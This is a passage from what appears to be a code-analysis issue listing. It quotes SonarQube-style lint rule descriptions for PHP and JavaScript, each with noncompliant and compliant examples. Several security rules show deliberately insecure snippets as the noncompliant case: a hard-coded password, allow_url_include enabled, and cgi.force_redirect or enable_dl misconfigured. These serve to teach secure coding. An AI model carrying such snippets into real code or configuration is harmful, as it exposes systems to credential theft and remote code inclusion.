Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n  return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n  return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Alias<\/th>\n      <th>Replacement<\/th>\n    <\/tr>\n    <tr>\n      <td><code>chop<\/code><\/td>\n      <td><code>rtrim<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>close<\/code><\/td>\n      <td><code>closedir<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>doubleval<\/code><\/td>\n      <td><code>floatval<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>fputs<\/code><\/td>\n      <td><code>fwrite<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ini_alter<\/code><\/td>\n      <td><code>ini_set<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_double<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_integer<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_long<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_real<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_writeable<\/code><\/td>\n      
<td><code>is_writable<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>join<\/code><\/td>\n      <td><code>implode<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>key_exists<\/code><\/td>\n      <td><code>array_key_exists<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>magic_quotes_runtime<\/code><\/td>\n      <td><code>set_magic_quotes_runtime<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>pos<\/code><\/td>\n      <td><code>current<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>show_source<\/code><\/td>\n      <td><code>highlight_file<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>sizeof<\/code><\/td>\n      <td><code>count<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>strchr<\/code><\/td>\n      <td><code>strstr<\/code><\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. 
This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. 
This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n  firstActionInBlock();\n  secondAction();  \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++)\n  $str = $array[$i];\n  doTheThing($str);  \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n  firstActionInBlock();\n  secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++) {\n  $str = $array[$i];\n  doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) 
and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct() {\n    $this-&gt;object = new SomeOtherClass();  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct(SomeOtherClass $object) {\n    $this-&gt;object = $object;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. 
To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n  Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. 
This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\"  Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\"  ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. 
Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini  Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. 
Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n  <li> see the URL over the user's shoulder <\/li>\n  <li> be sent the URL by the user <\/li>\n  <li> retrieve the URL from browser history <\/li>\n  <li> ... 
<\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. 
Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n  <li> It can significantly impair the readability of the code. <\/li>\n  <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n  <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. 
<\/li>\n  <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n  <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n  other than that cause by the increment or decrement operator <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n  effects <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n  same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a &lt; $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning 
<\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n  echo(\"i = $i\");\n  $i++;\n  if ($i &lt; 10){\n    goto loop;\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++){\n  echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n  <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/php.html by fixme

      BUG found
      Open

              window.data = {"total":92,"p":1,"ps":500,"rules":[{"key":"common-js:InsufficientBranchCoverage","repo":"common-js","name":"Branches should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the branch coverage on this file is less than the required threshold.It gives the number of branches to be covered in order to reach the required threshold.","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"minimumBranchCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"javascript:ArrayAndObjectConstructors","repo":"javascript","name":"Array constructors should not be used","htmlDesc":"<p>Array literals should always be preferred to Array constructors.<\/p>\n<p>Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:<\/p>\n<ul>\n  <li> If the argument is a number and it is a natural number the length will be equal to the value of the argument. <\/li>\n  <li> If the argument is a number, but not a natural number an exception will be thrown. <\/li>\n  <li> Otherwise the array will have one element with the argument as its value. <\/li>\n<\/ul>\n<p>For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a1 = new Array(x1, x2, x3);  \/\/ Noncompliant. Results in 3-element array.\nvar a2 = new Array(x1); \/\/ Noncompliant and variable in results\nvar a3 = new Array();  \/\/ Noncompliant. 
Results in 0-element array.\n\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar a1 = [x1, x2, x3];\nvar a2 = [x1];\nvar a3 = [];\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:AssignmentWithinCondition","repo":"javascript","name":"Assignments should not be made from within sub-expressions","htmlDesc":"<p>Assignments within sub-expressions are hard to spot and therefore make the code less readable. Ideally, sub-expressions should not have\nside-effects.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ((str = cont.substring(pos1, pos2)) != '') {  \/\/ Noncompliant\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nstr = cont.substring(pos1, pos2);\nif (str != '') {\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Assignments in <code>while<\/code> statement conditions, and assignments enclosed in relational expressions are allowed.<\/p>\n<pre>\nwhile ((line = nextLine()) != null) {...}  \/\/ Compliant\n\nwhile (line = nextLine()) {...}  \/\/ Compliant\n\nif (line = nextLine()) {...}  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.1 - Assignment operators shall not be used in expressions that yield a Boolean value <\/li>\n  <li> MISRA C++:2008, 6-2-1 - Assignment operators shall not be used in sub-expressions <\/li>\n  <li> MISRA C:2012, 13.4 - The result of an assignment operator should not be used <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/481.html\">MITRE, CWE-481<\/a> - Assigning instead of Comparing <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/nYFtAg\">CERT, EXP45-C.<\/a> - Do not perform assignments in selection statements <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1gCTAw\">CERT, EXP51-J.<\/a> - Do not perform assignments in conditional expressions\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KQvhAg\">CERT, EXP19-CPP.<\/a> - 
Do not perform assignments in conditional expressions\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/KYIyAQ\">CERT, MSC02-CPP.<\/a> - Avoid errors of omission <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:BitwiseOperators","repo":"javascript","name":"Bitwise operators should not be used in boolean contexts","htmlDesc":"<p>The bitwise operators <code>&amp;<\/code>, <code>|<\/code> can be mistaken for the boolean operators <code>&amp;&amp;<\/code> and <code>||<\/code>.\n<\/p>\n<p>This rule raises an issue when <code>&amp;<\/code> or <code>|<\/code> is used in a boolean context.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (a &amp; b) { ... } \/\/ Noncompliant; &amp; used in error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (a &amp;&amp; b) { ... }\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a file contains other bitwise operations, (<code>^<\/code>, <code>&lt;&lt;<\/code>, <code>&gt;&gt;&gt;<\/code>, <code>&gt;&gt;<\/code>,\n<code>~<\/code>, <code>&amp;=<\/code>, <code>^=<\/code>, <code>|=<\/code>, <code>&lt;&lt;=<\/code>, <code>&gt;&gt;=<\/code>, <code>&gt;&gt;&gt;=<\/code> and\n<code>&amp;<\/code> or <code>|<\/code> used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:BoundOrAssignedEvalOrArguments","repo":"javascript","name":"\"eval\" and \"arguments\" should not be bound or assigned","htmlDesc":"<p><code>eval<\/code> is used to evaluate a string as JavaScript code, and <code>arguments<\/code> is used to access function arguments through indexed\nproperties. 
As a consequence, <code>eval<\/code> and <code>arguments<\/code> should not be bound or assigned, because doing so would overwrite the\noriginal definitions of those two reserved words. <\/p>\n<p>What's more, using either of those two names to assign or bind will generate an error in JavaScript strict mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\neval = 17; \/\/ Noncompliant\narguments++; \/\/ Noncompliant\n++eval; \/\/ Noncompliant\nvar obj = { set p(arguments) { } }; \/\/ Noncompliant\nvar eval; \/\/ Noncompliant\ntry { } catch (arguments) { } \/\/ Noncompliant\nfunction x(eval) { } \/\/ Noncompliant\nfunction arguments() { } \/\/ Noncompliant\nvar y = function eval() { }; \/\/ Noncompliant\nvar f = new Function(\"arguments\", \"return 17;\"); \/\/ Noncompliant\n\nfunction fun() {\n  if (arguments.length == 0) { \/\/ Compliant\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nresult = 17;\nargs++;\n++result;\nvar obj = { set p(arg) { } };\nvar result;\ntry { } catch (args) { }\nfunction x(arg) { }\nfunction args() { }\nvar y = function fun() { };\nvar f = new Function(\"args\", \"return 17;\");\n\nfunction fun() {\n  if (arguments.length == 0) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:CollapsibleIfStatements","repo":"javascript","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x != undefined) {\n  if (x === 2) {\n    \/\/ ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x != undefined &amp;&amp; x === 2) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ContinueStatement","repo":"javascript","name":"\"continue\" should not be 
used","htmlDesc":"<p><code>continue<\/code> is an unstructured control flow statement. It makes code less testable, less readable and less maintainable. Structured\ncontrol flow statements such as <code>if<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  for (i = 0; i &lt; 10; i++) {\n    if (i == 5) {\n      continue;  \/* Noncompliant *\/\n    }\n    alert(\"i = \" + i);\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n  for (i = 0; i &lt; 10; i++) {\n    if (i != 5) {  \/* Compliant *\/\n      alert(\"i = \" + i);\n    }\n  }\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.5 - The continue statement shall not be used. <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:ElseIfWithoutElse","repo":"javascript","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0) {\n  doSomething();\n} else if (x == 1) {\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0) {\n  doSomething();\n} else if (x == 1) {\n  doSomethingElse();\n} else {\n  throw \"Unexpected value for x\";\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. 
